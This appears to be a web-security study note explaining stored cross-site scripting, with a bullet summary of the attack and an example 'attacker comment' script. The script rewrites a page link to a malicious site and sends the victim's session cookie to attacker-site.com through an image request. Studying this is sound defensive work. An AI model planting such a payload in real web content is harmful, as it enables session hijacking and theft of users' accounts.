Skip to content

Stored XSS

links: WS TOC - Cross Site Scripting (XSS) - Index


  • Attacker posts a script as a regular post / comment
  • Post / comment is sent to the server
  • When a user opens the post / comment the page is rendered and the script is executed
  • Can lead to modifications in the DOM (change links, add buttons)
  • Or, worse, sending personal information of users to attacker

Attacker Comment

<script>
// Change the first link on the page
var links = document.getElementsByTagName('a');
if (links.length > 0) {
    links[0].href = "http://malicious-site.com";
    links[0].textContent = 'Important Update'; 
}

// Send the current session ID to the attacker's server
var sessionId = document.cookie.match(
    /sessionid=([^;]+)/)[1];
if (sessionId) {
    var attackerServer = 'http://attacker-site.com/';
    var img = new Image();
    // Browser sends GET with sessionID in path
    img.src = attackerServer +
        "collect?sessionid=" + sessionId;
        document.body.appendChild(img);
}
</script>

links: WS TOC - Cross Site Scripting (XSS) - Index